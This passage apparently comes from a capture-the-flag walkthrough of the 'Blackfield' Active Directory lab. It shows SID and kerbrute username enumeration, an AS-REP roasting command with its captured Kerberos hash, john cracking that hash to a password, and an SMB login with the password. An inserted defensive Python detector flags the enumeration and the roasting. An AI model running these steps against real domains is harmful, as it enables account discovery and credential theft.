Password:
[*] Brute forcing SIDs at 10.129.229.17
[*] StringBinding ncacn_np:10.129.229.17[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4194615774-2175524697-3563712290
498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BLACKFIELD\Administrator (SidTypeUser)
501: BLACKFIELD\Guest (SidTypeUser)
502: BLACKFIELD\krbtgt (SidTypeUser)
512: BLACKFIELD\Domain Admins (SidTypeGroup)
513: BLACKFIELD\Domain Users (SidTypeGroup)
514: BLACKFIELD\Domain Guests (SidTypeGroup)
515: BLACKFIELD\Domain Computers (SidTypeGroup)
516: BLACKFIELD\Domain Controllers (SidTypeGroup)
517: BLACKFIELD\Cert Publishers (SidTypeAlias)
518: BLACKFIELD\Schema Admins (SidTypeGroup)
519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
525: BLACKFIELD\Protected Users (SidTypeGroup)
526: BLACKFIELD\Key Admins (SidTypeGroup)
527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
1000: BLACKFIELD\DC01$ (SidTypeUser)
1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
1103: BLACKFIELD\audit2020 (SidTypeUser)
1104: BLACKFIELD\support (SidTypeUser)
1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
1106: BLACKFIELD\BLACKFIELD538365 (SidTypeUser)
1107: BLACKFIELD\BLACKFIELD189208 (SidTypeUser)
1108: BLACKFIELD\BLACKFIELD404458 (SidTypeUser)
1109: BLACKFIELD\BLACKFIELD706381 (SidTypeUser)
1110: BLACKFIELD\BLACKFIELD937395 (SidTypeUser)
1111: BLACKFIELD\BLACKFIELD553715 (SidTypeUser)
1112: BLACKFIELD\BLACKFIELD840481 (SidTypeUser)
1113: BLACKFIELD\BLACKFIELD622501 (SidTypeUser)
1114: BLACKFIELD\BLACKFIELD787464 (SidTypeUser)
1115: BLACKFIELD\BLACKFIELD163183 (SidTypeUser)
1116: BLACKFIELD\BLACKFIELD869335 (SidTypeUser)
1117: BLACKFIELD\BLACKFIELD319016 (SidTypeUser)
1118: BLACKFIELD\BLACKFIELD600999 (SidTypeUser)
1119: BLACKFIELD\BLACKFIELD894905 (SidTypeUser)
1120: BLACKFIELD\BLACKFIELD253541 (SidTypeUser)
1121: BLACKFIELD\BLACKFIELD175204 (SidTypeUser)
1122: BLACKFIELD\BLACKFIELD727512 (SidTypeUser)
1123: BLACKFIELD\BLACKFIELD227380 (SidTypeUser)
1124: BLACKFIELD\BLACKFIELD251003 (SidTypeUser)
1125: BLACKFIELD\BLACKFIELD129328 (SidTypeUser)
1126: BLACKFIELD\BLACKFIELD616527 (SidTypeUser)
1127: BLACKFIELD\BLACKFIELD533551 (SidTypeUser)
1128: BLACKFIELD\BLACKFIELD883784 (SidTypeUser)
1129: BLACKFIELD\BLACKFIELD908329 (SidTypeUser)
1130: BLACKFIELD\BLACKFIELD601590 (SidTypeUser)
1131: BLACKFIELD\BLACKFIELD573498 (SidTypeUser)
1132: BLACKFIELD\BLACKFIELD290325 (SidTypeUser)
1133: BLACKFIELD\BLACKFIELD775986 (SidTypeUser)
1134: BLACKFIELD\BLACKFIELD348433 (SidTypeUser)
1135: BLACKFIELD\BLACKFIELD196444 (SidTypeUser)
1136: BLACKFIELD\BLACKFIELD137694 (SidTypeUser)
1137: BLACKFIELD\BLACKFIELD533886 (SidTypeUser)
1138: BLACKFIELD\BLACKFIELD268320 (SidTypeUser)
1139: BLACKFIELD\BLACKFIELD909590 (SidTypeUser)
1140: BLACKFIELD\BLACKFIELD136813 (SidTypeUser)
1141: BLACKFIELD\BLACKFIELD358090 (SidTypeUser)
1142: BLACKFIELD\BLACKFIELD561870 (SidTypeUser)
1143: BLACKFIELD\BLACKFIELD269538 (SidTypeUser)
1144: BLACKFIELD\BLACKFIELD169035 (SidTypeUser)
1145: BLACKFIELD\BLACKFIELD118321 (SidTypeUser)
1146: BLACKFIELD\BLACKFIELD592556 (SidTypeUser)
1147: BLACKFIELD\BLACKFIELD618519 (SidTypeUser)
1148: BLACKFIELD\BLACKFIELD329802 (SidTypeUser)
1149: BLACKFIELD\BLACKFIELD753480 (SidTypeUser)
1150: BLACKFIELD\BLACKFIELD837541 (SidTypeUser)
1151: BLACKFIELD\BLACKFIELD186980 (SidTypeUser)
1152: BLACKFIELD\BLACKFIELD419600 (SidTypeUser)
1153: BLACKFIELD\BLACKFIELD220786 (SidTypeUser)
1154: BLACKFIELD\BLACKFIELD767820 (SidTypeUser)
1155: BLACKFIELD\BLACKFIELD549571 (SidTypeUser)
1156: BLACKFIELD\BLACKFIELD411740 (SidTypeUser)
1157: BLACKFIELD\BLACKFIELD768095 (SidTypeUser)
1158: BLACKFIELD\BLACKFIELD835725 (SidTypeUser)
1159: BLACKFIELD\BLACKFIELD251977 (SidTypeUser)
1160: BLACKFIELD\BLACKFIELD430864 (SidTypeUser)
1161: BLACKFIELD\BLACKFIELD413242 (SidTypeUser)
1162: BLACKFIELD\BLACKFIELD464763 (SidTypeUser)
1163: BLACKFIELD\BLACKFIELD266096 (SidTypeUser)
1164: BLACKFIELD\BLACKFIELD334058 (SidTypeUser)
1165: BLACKFIELD\BLACKFIELD404213 (SidTypeUser)
1166: BLACKFIELD\BLACKFIELD219324 (SidTypeUser)
1167: BLACKFIELD\BLACKFIELD412798 (SidTypeUser)
1168: BLACKFIELD\BLACKFIELD441593 (SidTypeUser)
1169: BLACKFIELD\BLACKFIELD606328 (SidTypeUser)
1170: BLACKFIELD\BLACKFIELD796301 (SidTypeUser)
1171: BLACKFIELD\BLACKFIELD415829 (SidTypeUser)
1172: BLACKFIELD\BLACKFIELD820995 (SidTypeUser)
1173: BLACKFIELD\BLACKFIELD695166 (SidTypeUser)
1174: BLACKFIELD\BLACKFIELD759042 (SidTypeUser)
1175: BLACKFIELD\BLACKFIELD607290 (SidTypeUser)
1176: BLACKFIELD\BLACKFIELD229506 (SidTypeUser)
1177: BLACKFIELD\BLACKFIELD256791 (SidTypeUser)
1178: BLACKFIELD\BLACKFIELD997545 (SidTypeUser)
1179: BLACKFIELD\BLACKFIELD114762 (SidTypeUser)
1180: BLACKFIELD\BLACKFIELD321206 (SidTypeUser)
1181: BLACKFIELD\BLACKFIELD195757 (SidTypeUser)
1182: BLACKFIELD\BLACKFIELD877328 (SidTypeUser)
1183: BLACKFIELD\BLACKFIELD446463 (SidTypeUser)
1184: BLACKFIELD\BLACKFIELD579980 (SidTypeUser)
1185: BLACKFIELD\BLACKFIELD775126 (SidTypeUser)
1186: BLACKFIELD\BLACKFIELD429587 (SidTypeUser)
1187: BLACKFIELD\BLACKFIELD534956 (SidTypeUser)
1188: BLACKFIELD\BLACKFIELD315276 (SidTypeUser)
1189: BLACKFIELD\BLACKFIELD995218 (SidTypeUser)
1190: BLACKFIELD\BLACKFIELD843883 (SidTypeUser)
1191: BLACKFIELD\BLACKFIELD876916 (SidTypeUser)
1192: BLACKFIELD\BLACKFIELD382769 (SidTypeUser)
1193: BLACKFIELD\BLACKFIELD194732 (SidTypeUser)
1194: BLACKFIELD\BLACKFIELD191416 (SidTypeUser)
1195: BLACKFIELD\BLACKFIELD932709 (SidTypeUser)
1196: BLACKFIELD\BLACKFIELD546640 (SidTypeUser)
1197: BLACKFIELD\BLACKFIELD569313 (SidTypeUser)
1198: BLACKFIELD\BLACKFIELD744790 (SidTypeUser)
1199: BLACKFIELD\BLACKFIELD739659 (SidTypeUser)
1200: BLACKFIELD\BLACKFIELD926559 (SidTypeUser)
1201: BLACKFIELD\BLACKFIELD969352 (SidTypeUser)
1202: BLACKFIELD\BLACKFIELD253047 (SidTypeUser)
1203: BLACKFIELD\BLACKFIELD899433 (SidTypeUser)
1204: BLACKFIELD\BLACKFIELD606964 (SidTypeUser)
1205: BLACKFIELD\BLACKFIELD385719 (SidTypeUser)
1206: BLACKFIELD\BLACKFIELD838710 (SidTypeUser)
1207: BLACKFIELD\BLACKFIELD608914 (SidTypeUser)
1208: BLACKFIELD\BLACKFIELD569653 (SidTypeUser)
1209: BLACKFIELD\BLACKFIELD759079 (SidTypeUser)
1210: BLACKFIELD\BLACKFIELD488531 (SidTypeUser)
1211: BLACKFIELD\BLACKFIELD160610 (SidTypeUser)
1212: BLACKFIELD\BLACKFIELD586934 (SidTypeUser)
1213: BLACKFIELD\BLACKFIELD819822 (SidTypeUser)
1214: BLACKFIELD\BLACKFIELD739765 (SidTypeUser)
1215: BLACKFIELD\BLACKFIELD875008 (SidTypeUser)
1216: BLACKFIELD\BLACKFIELD441759 (SidTypeUser)
1217: BLACKFIELD\BLACKFIELD763893 (SidTypeUser)
1218: BLACKFIELD\BLACKFIELD713470 (SidTypeUser)
1219: BLACKFIELD\BLACKFIELD131771 (SidTypeUser)
1220: BLACKFIELD\BLACKFIELD793029 (SidTypeUser)
1221: BLACKFIELD\BLACKFIELD694429 (SidTypeUser)
1222: BLACKFIELD\BLACKFIELD802251 (SidTypeUser)
1223: BLACKFIELD\BLACKFIELD602567 (SidTypeUser)
1224: BLACKFIELD\BLACKFIELD328983 (SidTypeUser)
1225: BLACKFIELD\BLACKFIELD990638 (SidTypeUser)
1226: BLACKFIELD\BLACKFIELD350809 (SidTypeUser)
1227: BLACKFIELD\BLACKFIELD405242 (SidTypeUser)
1228: BLACKFIELD\BLACKFIELD267457 (SidTypeUser)
1229: BLACKFIELD\BLACKFIELD686428 (SidTypeUser)
1230: BLACKFIELD\BLACKFIELD478828 (SidTypeUser)
1231: BLACKFIELD\BLACKFIELD129387 (SidTypeUser)
1232: BLACKFIELD\BLACKFIELD544934 (SidTypeUser)
1233: BLACKFIELD\BLACKFIELD115148 (SidTypeUser)
1234: BLACKFIELD\BLACKFIELD753537 (SidTypeUser)
1235: BLACKFIELD\BLACKFIELD416532 (SidTypeUser)
1236: BLACKFIELD\BLACKFIELD680939 (SidTypeUser)
1237: BLACKFIELD\BLACKFIELD732035 (SidTypeUser)
1238: BLACKFIELD\BLACKFIELD522135 (SidTypeUser)
1239: BLACKFIELD\BLACKFIELD773423 (SidTypeUser)
1240: BLACKFIELD\BLACKFIELD371669 (SidTypeUser)
1241: BLACKFIELD\BLACKFIELD252379 (SidTypeUser)
1242: BLACKFIELD\BLACKFIELD828826 (SidTypeUser)
1243: BLACKFIELD\BLACKFIELD548394 (SidTypeUser)
1244: BLACKFIELD\BLACKFIELD611993 (SidTypeUser)
1245: BLACKFIELD\BLACKFIELD192642 (SidTypeUser)
1246: BLACKFIELD\BLACKFIELD106360 (SidTypeUser)
1247: BLACKFIELD\BLACKFIELD939243 (SidTypeUser)
1248: BLACKFIELD\BLACKFIELD230515 (SidTypeUser)
1249: BLACKFIELD\BLACKFIELD774376 (SidTypeUser)
1250: BLACKFIELD\BLACKFIELD576233 (SidTypeUser)
1251: BLACKFIELD\BLACKFIELD676303 (SidTypeUser)
1252: BLACKFIELD\BLACKFIELD673073 (SidTypeUser)
1253: BLACKFIELD\BLACKFIELD558867 (SidTypeUser)
1254: BLACKFIELD\BLACKFIELD184482 (SidTypeUser)
1255: BLACKFIELD\BLACKFIELD724669 (SidTypeUser)
1256: BLACKFIELD\BLACKFIELD765350 (SidTypeUser)
1257: BLACKFIELD\BLACKFIELD411132 (SidTypeUser)
1258: BLACKFIELD\BLACKFIELD128775 (SidTypeUser)
1259: BLACKFIELD\BLACKFIELD704154 (SidTypeUser)
1260: BLACKFIELD\BLACKFIELD107197 (SidTypeUser)
1261: BLACKFIELD\BLACKFIELD994577 (SidTypeUser)
1262: BLACKFIELD\BLACKFIELD683323 (SidTypeUser)
1263: BLACKFIELD\BLACKFIELD433476 (SidTypeUser)
1264: BLACKFIELD\BLACKFIELD644281 (SidTypeUser)
1265: BLACKFIELD\BLACKFIELD195953 (SidTypeUser)
1266: BLACKFIELD\BLACKFIELD868068 (SidTypeUser)
1267: BLACKFIELD\BLACKFIELD690642 (SidTypeUser)
1268: BLACKFIELD\BLACKFIELD465267 (SidTypeUser)
1269: BLACKFIELD\BLACKFIELD199889 (SidTypeUser)
1270: BLACKFIELD\BLACKFIELD468839 (SidTypeUser)
1271: BLACKFIELD\BLACKFIELD348835 (SidTypeUser)
1272: BLACKFIELD\BLACKFIELD624385 (SidTypeUser)
1273: BLACKFIELD\BLACKFIELD818863 (SidTypeUser)
1274: BLACKFIELD\BLACKFIELD939200 (SidTypeUser)
1275: BLACKFIELD\BLACKFIELD135990 (SidTypeUser)
1276: BLACKFIELD\BLACKFIELD484290 (SidTypeUser)
1277: BLACKFIELD\BLACKFIELD898237 (SidTypeUser)
1278: BLACKFIELD\BLACKFIELD773118 (SidTypeUser)
1279: BLACKFIELD\BLACKFIELD148067 (SidTypeUser)
1280: BLACKFIELD\BLACKFIELD390179 (SidTypeUser)
1281: BLACKFIELD\BLACKFIELD359278 (SidTypeUser)
1282: BLACKFIELD\BLACKFIELD375924 (SidTypeUser)
1283: BLACKFIELD\BLACKFIELD533060 (SidTypeUser)
1284: BLACKFIELD\BLACKFIELD534196 (SidTypeUser)
1285: BLACKFIELD\BLACKFIELD639103 (SidTypeUser)
1286: BLACKFIELD\BLACKFIELD933887 (SidTypeUser)
1287: BLACKFIELD\BLACKFIELD907614 (SidTypeUser)
1288: BLACKFIELD\BLACKFIELD991588 (SidTypeUser)
1289: BLACKFIELD\BLACKFIELD781404 (SidTypeUser)
1290: BLACKFIELD\BLACKFIELD787995 (SidTypeUser)
1291: BLACKFIELD\BLACKFIELD911926 (SidTypeUser)
1292: BLACKFIELD\BLACKFIELD146200 (SidTypeUser)
1293: BLACKFIELD\BLACKFIELD826622 (SidTypeUser)
1294: BLACKFIELD\BLACKFIELD171624 (SidTypeUser)
1295: BLACKFIELD\BLACKFIELD497216 (SidTypeUser)
1296: BLACKFIELD\BLACKFIELD839613 (SidTypeUser)
1297: BLACKFIELD\BLACKFIELD428532 (SidTypeUser)
1298: BLACKFIELD\BLACKFIELD697473 (SidTypeUser)
1299: BLACKFIELD\BLACKFIELD291678 (SidTypeUser)
1300: BLACKFIELD\BLACKFIELD623122 (SidTypeUser)
1301: BLACKFIELD\BLACKFIELD765982 (SidTypeUser)
1302: BLACKFIELD\BLACKFIELD701303 (SidTypeUser)
1303: BLACKFIELD\BLACKFIELD250576 (SidTypeUser)
1304: BLACKFIELD\BLACKFIELD971417 (SidTypeUser)
1305: BLACKFIELD\BLACKFIELD160820 (SidTypeUser)
1306: BLACKFIELD\BLACKFIELD385928 (SidTypeUser)
1307: BLACKFIELD\BLACKFIELD848660 (SidTypeUser)
1308: BLACKFIELD\BLACKFIELD682842 (SidTypeUser)
1309: BLACKFIELD\BLACKFIELD813266 (SidTypeUser)
1310: BLACKFIELD\BLACKFIELD274577 (SidTypeUser)
1311: BLACKFIELD\BLACKFIELD448641 (SidTypeUser)
1312: BLACKFIELD\BLACKFIELD318077 (SidTypeUser)
1313: BLACKFIELD\BLACKFIELD289513 (SidTypeUser)
1314: BLACKFIELD\BLACKFIELD336573 (SidTypeUser)
1315: BLACKFIELD\BLACKFIELD962495 (SidTypeUser)
1316: BLACKFIELD\BLACKFIELD566117 (SidTypeUser)
1317: BLACKFIELD\BLACKFIELD617630 (SidTypeUser)
1318: BLACKFIELD\BLACKFIELD717683 (SidTypeUser)
1319: BLACKFIELD\BLACKFIELD390192 (SidTypeUser)
1320: BLACKFIELD\BLACKFIELD652779 (SidTypeUser)
1321: BLACKFIELD\BLACKFIELD665997 (SidTypeUser)
1322: BLACKFIELD\BLACKFIELD998321 (SidTypeUser)
1323: BLACKFIELD\BLACKFIELD946509 (SidTypeUser)
1324: BLACKFIELD\BLACKFIELD228442 (SidTypeUser)
1325: BLACKFIELD\BLACKFIELD548464 (SidTypeUser)
1326: BLACKFIELD\BLACKFIELD586592 (SidTypeUser)
1327: BLACKFIELD\BLACKFIELD512331 (SidTypeUser)
1328: BLACKFIELD\BLACKFIELD609423 (SidTypeUser)
1329: BLACKFIELD\BLACKFIELD395725 (SidTypeUser)
1330: BLACKFIELD\BLACKFIELD438923 (SidTypeUser)
1331: BLACKFIELD\BLACKFIELD691480 (SidTypeUser)
1332: BLACKFIELD\BLACKFIELD236467 (SidTypeUser)
1333: BLACKFIELD\BLACKFIELD895235 (SidTypeUser)
1334: BLACKFIELD\BLACKFIELD788523 (SidTypeUser)
1335: BLACKFIELD\BLACKFIELD710285 (SidTypeUser)
1336: BLACKFIELD\BLACKFIELD357023 (SidTypeUser)
1337: BLACKFIELD\BLACKFIELD362337 (SidTypeUser)
1338: BLACKFIELD\BLACKFIELD651599 (SidTypeUser)
1339: BLACKFIELD\BLACKFIELD579344 (SidTypeUser)
1340: BLACKFIELD\BLACKFIELD859776 (SidTypeUser)
1341: BLACKFIELD\BLACKFIELD789969 (SidTypeUser)
1342: BLACKFIELD\BLACKFIELD356727 (SidTypeUser)
1343: BLACKFIELD\BLACKFIELD962999 (SidTypeUser)
1344: BLACKFIELD\BLACKFIELD201655 (SidTypeUser)
1345: BLACKFIELD\BLACKFIELD635996 (SidTypeUser)
1346: BLACKFIELD\BLACKFIELD478410 (SidTypeUser)
1347: BLACKFIELD\BLACKFIELD518316 (SidTypeUser)
1348: BLACKFIELD\BLACKFIELD202900 (SidTypeUser)
1349: BLACKFIELD\BLACKFIELD767498 (SidTypeUser)
1350: BLACKFIELD\BLACKFIELD103974 (SidTypeUser)
1351: BLACKFIELD\BLACKFIELD135403 (SidTypeUser)
1352: BLACKFIELD\BLACKFIELD112766 (SidTypeUser)
1353: BLACKFIELD\BLACKFIELD978938 (SidTypeUser)
1354: BLACKFIELD\BLACKFIELD871753 (SidTypeUser)
1355: BLACKFIELD\BLACKFIELD136203 (SidTypeUser)
1356: BLACKFIELD\BLACKFIELD634593 (SidTypeUser)
1357: BLACKFIELD\BLACKFIELD274367 (SidTypeUser)
1358: BLACKFIELD\BLACKFIELD520852 (SidTypeUser)
1359: BLACKFIELD\BLACKFIELD339143 (SidTypeUser)
1360: BLACKFIELD\BLACKFIELD684814 (SidTypeUser)
1361: BLACKFIELD\BLACKFIELD792484 (SidTypeUser)
1362: BLACKFIELD\BLACKFIELD802875 (SidTypeUser)
1363: BLACKFIELD\BLACKFIELD383108 (SidTypeUser)
1364: BLACKFIELD\BLACKFIELD318250 (SidTypeUser)
1365: BLACKFIELD\BLACKFIELD496547 (SidTypeUser)
1366: BLACKFIELD\BLACKFIELD219914 (SidTypeUser)
1367: BLACKFIELD\BLACKFIELD454313 (SidTypeUser)
1368: BLACKFIELD\BLACKFIELD460131 (SidTypeUser)
1369: BLACKFIELD\BLACKFIELD613771 (SidTypeUser)
1370: BLACKFIELD\BLACKFIELD632329 (SidTypeUser)
1371: BLACKFIELD\BLACKFIELD402639 (SidTypeUser)
1372: BLACKFIELD\BLACKFIELD235930 (SidTypeUser)
1373: BLACKFIELD\BLACKFIELD246388 (SidTypeUser)
1374: BLACKFIELD\BLACKFIELD946435 (SidTypeUser)
1375: BLACKFIELD\BLACKFIELD739227 (SidTypeUser)
1376: BLACKFIELD\BLACKFIELD827906 (SidTypeUser)
1377: BLACKFIELD\BLACKFIELD198927 (SidTypeUser)
1378: BLACKFIELD\BLACKFIELD169876 (SidTypeUser)
1379: BLACKFIELD\BLACKFIELD150357 (SidTypeUser)
1380: BLACKFIELD\BLACKFIELD594619 (SidTypeUser)
1381: BLACKFIELD\BLACKFIELD274109 (SidTypeUser)
1382: BLACKFIELD\BLACKFIELD682949 (SidTypeUser)
1383: BLACKFIELD\BLACKFIELD316850 (SidTypeUser)
1384: BLACKFIELD\BLACKFIELD884808 (SidTypeUser)
1385: BLACKFIELD\BLACKFIELD327610 (SidTypeUser)
1386: BLACKFIELD\BLACKFIELD899238 (SidTypeUser)
1387: BLACKFIELD\BLACKFIELD184493 (SidTypeUser)
1388: BLACKFIELD\BLACKFIELD631162 (SidTypeUser)
1389: BLACKFIELD\BLACKFIELD591846 (SidTypeUser)
1390: BLACKFIELD\BLACKFIELD896715 (SidTypeUser)
1391: BLACKFIELD\BLACKFIELD500073 (SidTypeUser)
1392: BLACKFIELD\BLACKFIELD584113 (SidTypeUser)
1393: BLACKFIELD\BLACKFIELD204805 (SidTypeUser)
1394: BLACKFIELD\BLACKFIELD842593 (SidTypeUser)
1395: BLACKFIELD\BLACKFIELD397679 (SidTypeUser)
1396: BLACKFIELD\BLACKFIELD842438 (SidTypeUser)
1397: BLACKFIELD\BLACKFIELD286615 (SidTypeUser)
1398: BLACKFIELD\BLACKFIELD224839 (SidTypeUser)
1399: BLACKFIELD\BLACKFIELD631599 (SidTypeUser)
1400: BLACKFIELD\BLACKFIELD247450 (SidTypeUser)
1401: BLACKFIELD\BLACKFIELD290582 (SidTypeUser)
1402: BLACKFIELD\BLACKFIELD657263 (SidTypeUser)
1403: BLACKFIELD\BLACKFIELD314351 (SidTypeUser)
1404: BLACKFIELD\BLACKFIELD434395 (SidTypeUser)
1405: BLACKFIELD\BLACKFIELD410243 (SidTypeUser)
1406: BLACKFIELD\BLACKFIELD307633 (SidTypeUser)
1407: BLACKFIELD\BLACKFIELD758945 (SidTypeUser)
1408: BLACKFIELD\BLACKFIELD541148 (SidTypeUser)
1409: BLACKFIELD\BLACKFIELD532412 (SidTypeUser)
1410: BLACKFIELD\BLACKFIELD996878 (SidTypeUser)
1411: BLACKFIELD\BLACKFIELD653097 (SidTypeUser)
1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
1413: BLACKFIELD\svc_backup (SidTypeUser)
1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
1415: BLACKFIELD\PC01$ (SidTypeUser)
1416: BLACKFIELD\PC02$ (SidTypeUser)
1417: BLACKFIELD\PC03$ (SidTypeUser)
1418: BLACKFIELD\PC04$ (SidTypeUser)
1419: BLACKFIELD\PC05$ (SidTypeUser)
1420: BLACKFIELD\PC06$ (SidTypeUser)
1421: BLACKFIELD\PC07$ (SidTypeUser)
1422: BLACKFIELD\PC08$ (SidTypeUser)
1423: BLACKFIELD\PC09$ (SidTypeUser)
1424: BLACKFIELD\PC10$ (SidTypeUser)
1425: BLACKFIELD\PC11$ (SidTypeUser)
1426: BLACKFIELD\PC12$ (SidTypeUser)
1427: BLACKFIELD\PC13$ (SidTypeUser)
1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)

Brute-forcing usernames with kerbrute

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./kerbrute_linux_amd64 userenum --dc 10.129.229.17 -d BLACKFIELD.local users.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/22/26 - Ronnie Flathers @ropnop

2026/06/22 01:51:29 > Using KDC(s):
2026/06/22 01:51:29 > 10.129.229.17:88

2026/06/22 01:51:51 > [+] VALID USERNAME: audit2020@BLACKFIELD.local
2026/06/22 01:53:50 > [+] VALID USERNAME: support@BLACKFIELD.local
2026/06/22 01:53:55 > [+] VALID USERNAME: svc_backup@BLACKFIELD.local
2026/06/22 01:54:22 > Done! Tested 314 usernames (3 valid) in 172.957 seconds

AS-REP Roasting attack

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.229.17 BLACKFIELD.local/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:04643310da06a76f4ddc689721e9626d$4746c7eba7e64fc814a81f4ad22fc66a9374cb8dcb7a30e79401ea36e1fe9b2b61fbeeb078ce2fcfc6e47b986f96cadeb72351eab684cb1e87d11025c106ad519442f817d0e34170e352eef68c79293cdd998554ec01afcbd6910712a079028e5865268f6c39531730d8b175fb76b82cec13398078dba823d320992241a768e60329e4fd710882032ba747a8c1f0db04103a0f9c343fc6c2a34354feb8e601f3050035c5b4748cff59abba4ff615b5b19f6c0670e72565a3f2ff680e98667f0660d518a75fcf07e60466a85892fcbb469bb20edec2fa9114febefb6aaefc08cd33f811f063e77ea8d5d66baa045f05113186e3ec
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
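As an added example (not part of the original walkthrough), the defender's view of the two Kerberos steps above: detection logic in Python that runs over constructed Windows Security event 4768 records and flags both the unknown-principal burst a kerbrute userenum run leaves on the DC and the no-pre-auth RC4 ticket issuance that GetNPUsers harvests. The log lines, client addresses (10.10.14.x) and the flattened key=value layout are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security event 4768 (Kerberos TGT request)
# records, flattened to one "key=value" line per event.  Field meanings:
#   Status 0x6  = KDC_ERR_C_PRINCIPAL_UNKNOWN (the name does not exist)
#   Status 0x0  = TGT issued
#   TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256-CTS, 0xffffffff = none
#   PreAuthType 0 = no pre-authentication (UF_DONT_REQUIRE_PREAUTH account)
#   PreAuthType 2 = PA-ENC-TIMESTAMP, the normal password-based pre-auth
# The timestamps, client addresses (10.10.14.x) and guessed names are made up.
BASE = datetime(2026, 6, 22, 1, 51, 29)


def _rec(offset_s, user, ip, status, etype, preauth):
    ts = (BASE + timedelta(seconds=offset_s)).isoformat()
    return (f"{ts} EventID=4768 TargetUserName={user} IpAddress={ip} "
            f"Status={status} TicketEncryptionType={etype} PreAuthType={preauth}")


SAMPLE_4768_LOG = "\n".join(
    # a name-guessing burst: 25 unknown-principal failures from one client
    [_rec(i, f"guess{i:03d}", "10.10.14.5", "0x6", "0xffffffff", "-")
     for i in range(25)]
    + [
        # roastable account: TGT issued with no pre-auth and an RC4 ticket
        _rec(28, "support", "10.10.14.5", "0x0", "0x17", "0"),
        # benign traffic: a normal logon, one typo, a service logon later on
        _rec(40, "lydericlefebvre", "10.10.14.9", "0x0", "0x12", "2"),
        _rec(41, "lydericlefebvr", "10.10.14.9", "0x6", "0xffffffff", "-"),
        _rec(900, "svc_backup", "10.129.229.20", "0x0", "0x12", "2"),
    ]
)

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_4768(log_text):
    """Turn the flattened log into a list of dicts with a datetime timestamp."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        fields = dict(FIELD_RE.findall(rest))
        if fields.get("EventID") != "4768":
            continue
        fields["timestamp"] = datetime.fromisoformat(ts)
        events.append(fields)
    return events


def find_user_enumeration(events, threshold=20, window=timedelta(seconds=60)):
    """Clients that produced >= threshold unknown-principal (0x6) failures
    inside any sliding window.  Ordinary typos are rare and spread out; a
    wordlist run such as the kerbrute userenum above fails hundreds of
    times in a few minutes from one address.  Returns {ip: peak_count}."""
    by_ip = defaultdict(list)
    for e in events:
        if e.get("Status") == "0x6":
            by_ip[e["IpAddress"]].append(e["timestamp"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def find_asrep_roasting(events):
    """Successful TGT issuance with PreAuthType 0 and an RC4 (0x17) ticket:
    exactly the AS-REP a GetNPUsers run collects for offline cracking.
    Returns sorted (account, client ip) pairs so the account can be switched
    back to requiring pre-auth and the client investigated."""
    return sorted({(e["TargetUserName"], e["IpAddress"])
                   for e in events
                   if e.get("Status") == "0x0"
                   and e.get("PreAuthType") == "0"
                   and e.get("TicketEncryptionType") == "0x17"})


if __name__ == "__main__":
    evts = parse_4768(SAMPLE_4768_LOG)
    print("enumeration sources:", find_user_enumeration(evts))
    print("AS-REP roasted accounts:", find_asrep_roasting(evts))
```

On a real DC the same fields come from the 4768 event XML (Status, PreAuthType, TicketEncryptionType, IpAddress), so the two functions apply unchanged once the events are flattened the same way.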

Cracking the hash with john

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:10 DONE (2026-06-22 01:59) 0.09784g/s 1402Kp/s 1402Kc/s 1402KC/s #1WIF3Y..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Obtained credentials: support:#00^BlackKnight

Use these credentials to enumerate SMB shares and users

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'support' -p '#00^BlackKnight'
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
